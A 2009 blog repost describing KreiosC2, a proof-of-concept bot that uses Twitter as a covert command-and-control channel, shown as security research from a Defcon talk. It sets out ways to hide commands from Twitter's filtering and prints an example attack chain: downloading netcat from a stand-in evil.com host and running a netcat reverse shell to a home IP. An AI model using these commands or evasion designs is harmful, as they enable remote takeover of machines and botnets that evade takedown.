KreiosC2..twitter and networking

Posted on August 14, 2009 by rockingjude

KreiosC2

KreiosC2 is a proof of concept bot which uses Twitter as its Command and Control channel. Obviously this can be used for malicious purposes but also for good ones, you can set up a bot at home to listen to your Twitter feed and perform actions on it. I’ll discuss the potentially malicious use of it here but it would be easy to take the concepts and use them for good.

They say a picture is worth a thousand words so a video must be worth more, here is a video of KreiosC2 in action put together by Tom Eston for his Defcon talk.

Whats new since version 1?

First the name change. Version 1 of this project was called TwitterBot. Unfortunately, I didn’t do any research before using the name and only after I launched it I realised that there were already a lot of other projects out there with the same name. The name KreiosC2 was created by Tom and is made up from Kreios, a Greek Titan God, and C2 which is the name the military uses to define command and control.


Second, and really more importantly, KreiosC2 now has the ability to dynamically update the control language used and add new features on the fly without any restarts or any manual intervention.

Background

The reason I was thinking about Twitter is it has such a large community that it would be easy to hide random commands in the large amount of data that is generated each day. It also has a really good API that would make integration easy.

My first idea was to have a protected twitter account which only the bots could read. This would restrict who could see the commands but it would be easy for Twitter to block that user. My next thought was to send the commands to random accounts and then have the bot use the search feature to find the commands. This would mean that it would be harder for Twitter to block the messages as the commands could be posted from any account to any other account. For this to work the bot would have to have a way to spot the commands in the general mess of other tweets out there. The problem with this is that if the bot can spot the commands then Twitter could also do the same matching and automatically drop those tweets. This is a harder one to defend against. My plan to defeat this would be to use seemingly innocent commands, such as “check out this link …” to say download a file, which would be hard for Twitter to block without upsetting legitimate users but I don’t know how hard it would be to create a command language based on this.

I proposed these ideas to Tom Eston (from the xc ), who is currently doing work on social media botnets, and to Mubix (who everyone knows). Tom suggested using TinyURL to obfuscate commands or to use hash tags to represent certain things. You could also get the bots to follow certain accounts to mark themselves as bots. If they followed a specific bot master account then they would be easy to spot but having them follow a general account, the BBC say, again they could be lost in the masses unless you knew where to look. Tom is giving a talk at Notacon where he will be talking a bit more about this and other social media bots.

Mubix added the following ideas:

  • Use a time based code that is based on the time of the twitter update so, bots check via the public time line what the current time is, and based on the hour they are checking within ( 7AM, 2PM etc) they have a specific minute to look for a command within (i.e. at 7 PM they are looking for a command at 7:13). This command would be a cipher text posted by one of over a hundred dummy twitter accounts, and no matter how many accounts Twitter got rid of, you could always make more

  • Again going with the key. You could simply use Unix time as part of the post. So, bot checks twitter time based on public stream, converts to Unix time, does a search on twitter for the current Unix time and looks for the second part of the key would be an easy cipher. Once they found the key, it would be: “1239197528 How do I convert this to normal date time?” – And then the bot would take the first letter of each of the words: HDICTTNDT and look up that user then take it’s latest post and issue the command in the post. “ping -t victim.com”

Some interesting ideas on the packet structure have been suggested by Tcrweb at his blog. I’d personally expand the command byte to at least two bytes to allow for expansion but apart from that I like the ideas.

Implementation

Rather than just giving theory I took these ideas and created a small proof of concept. It has a very small command set, just four commands, and is written in Ruby so hopefully won’t be turned malicious any time soon but I hope it demonstrates what is possible.

It goes for my first option of just following a chosen account and then stepping through all its tweets looking for commands to execute. To use it download the package from below and configure it by editing both the kreiosc2_command.rb and kreiosc2.rb. The command app needs to know the account it will be posting messages as and the password needed to access that account. These values go in the SCREEN_NAME and PASSWORD constants near the top of the file. The bot (kreiosc2.rb) just needs to know the screen name to watch, that goes in SCREEN_NAME again, somewhere near the top of the file. You will need Ruby installed and a number of Gems. Rather than try to work out which are needed for this app here is a list of all the ones I have installed, if you install them all it should work fine!

  • crack (0.1.1)

  • echoe (3.1.1)

  • highline (1.5.0)

  • hoe (1.12.1)

  • hpricot (0.8.1)

  • http_configuration (1.0.2)

  • httparty (0.4.2)

  • nokogiri (1.2.3)

  • rake (0.8.4)

  • rcov (0.8.1.2.0)

  • rubyforge (1.0.3)

  • rubyzip (0.9.1)

Both apps will take a --help and give their parameters, the bot is fairly simple, it just starts up, scans for commands then sleeps, wakes and scans again. By default it won’t process any messages prior to the current time, this is useful if you want to start fresh while testing so you can ignore all your old stuff. To have it process all commands it finds add the --previous option.

The commander can be asked to send these commands:

exec

Execute the given command

get

Download the specified file

language

Download and use a new language file

ping

Ping the specified IP address (not domain name, I was playing with input validation)

These commands work best when put together into something like the following set of commands:

  1. ping 1.2.3.4 – Get the bot to report home and check it has Internet access

  2. get http://www.evil.com/nc – Download netcat

  3. exec nc 1.2.3.4 6666 -e /bin/bash – Send a shell home

Languages And Dynamic Updates

The big new feature added in version 2 is the ability to have KreiosC2 update itself on the fly, the main idea for this is to change its control language but it can also be used to add or update existing commands and features. Languages are built in two parts, the file used by the command to encode the tweets that are sent to Twitter and the file used by the bot to decode the tweets.

KreiosC2 comes with the following languages:

Default

The same language used in version 1, commands are identified by messages starting with :cmd followed by the command.

English

Commands are written using English phrases, for example “look at 1.2.4.4″ will ping the address 1.2.4.4. The messages also have a checksum appended to them to stop real tweets from slipping in. The checksum is made up from the last 10 bytes of an MD5 of the message.

Encoded

The encoded language is simply the default language base64 encoded. Encoding is not encryption but this adds a little obfuscation to the tweet.

Encrypted

This language combines bits from all three other languages, the language from Default, the checksum from English and the base64 encoding from Encoded. The tweet is built up from the command followed by the first 10 characters of a SHA1 of the message, this is then encrypted using AES and finally base64 encoded so it can be tweeted as an ASCII message.

By default both bot and commander speak in the Default language.

Setting Up And Using A Language

The current languages work by storing the language file on a web server and asking the bot to retrieve it and start using it by sending the language command. For the bots to know where to find the file a TinyURL is created and the page part of the URL is passed from the commander to the bot as a parameter to the language command.

For example, if I want to use the Encoded language I first need to upload it to a public facing web server. I then take the URL, for example www.digininja.org/kreios/encoded_language.rb, and generate a TinyURL for it, www.tinyurl.com/ABCDEF. Finally I take the page part of the URL, ABCDEF, and that is the parameter I pass to the language command, ./kreiosc2_command.rb --language ABCDEF.

Once the change language command has been sent out the commander must start speaking in the new language or its messages will be ignored by the bot. To do this use the –use-language argument which takes as a parameter the name of the command language file. For example, if the bot was working in English I would need to use --use-language english_command_language.rb. The bot can also be started with the –use-language command to start it on a language other than Default.

Whats The Point?

The obvious one is that you think Twitter is on to your secret channel and are likely to start blocking messages. You simply change your language and they are back to step 1 trying to spot the messages again. If Twitter can get a handle on what to look for they will be able to use the same pattern matching the bot is using to spot messages and filter them out of the feed. By changing the language periodically they will have to continuously do work to find and implement new patterns. Also, by using a language like English Twitter’s job can be made harder as they have to be careful to filter out only the bad messages so as not to disrupt legitimate users.

The other main use is to extend the bots functionality. A new language file can be created which simply adds new functionality to the existing language, for example adding a port scan command to Default, changing the Twitter user the bot is watching or changing the update frequency.

Download

Download KreiosC2

Additional Language Packs

Split Language – The command is sent as one tweet followed by the argument as the second that follows on. Hopefully as requested by @Marsmensch.

KreiosC2 in the Press

Version 2 will be launched at Defcon 2009 in a presentation by Tom Eston and Kevin Johnson called “Social Zombies: Your Friends Want to Eat Your Brains”. I’ll post a link to the video/slides as soon as I get hold of it.

Version 1 was featured in Tom’s Notacon presentation The Rise of the Autobots where he discussed the topic of creating and using bots with social media sites to either automate their use or use the sites themselves to aid other enterprises.

We also made it into an article on Dark Reading in an article on the new ways handlers are communicating with their bots.

A short article by Christiaan Beek of securitybananas.com on KreiosC2.

If you know of any other articles please let me know and I’ll add references.

Conclusion

Hopefully this gives you an idea of the potential for using Twitter to control a bot or botnet. While I think this is a good idea in theory I do believe that once someone reverse engineers a bot and works out the command syntax it would probably be possible for Twitter to shut the system down fairly well, however, if the reverse engineering job was made hard enough and the commands made either very generic or just maybe a really large amount of them, maybe 50 different ways to say execute a command, then it would take Twitter a while to workout the fix and implement it which may just give the bad guys the edge they need. Regularly changing languages will also help keep Twitter busy by decreasing the time they have to reverse the language and to put blocks in place.

I was in two minds about releasing this idea, partly because I thought it was a bit mad as Twitter could shut this kind of thing down a lot easier than, say, the DNS registrars could stop the registering of the domain names Confiker uses to control its bots, and partly because if it did work and someone does use this for badness then it is quite scary that I may have triggered it. But after talking to Mubix and Tom we decided that disclosure is better than keeping things boxed up so I’ve put it out. Please give me any feedback as I’m interested to know what others think.

http://www.digininja.org/projects/kreiosc2.php

Reblog this post [with Zemanta]
Share

Leave a Reply

Name

Email

Website


© 2009-2012 Project World Awareness All Rights Reserved -- Copyright notice by Blog Copyright

Thank you for using IGIT Tweet Button, a plugin by PHP Freelancer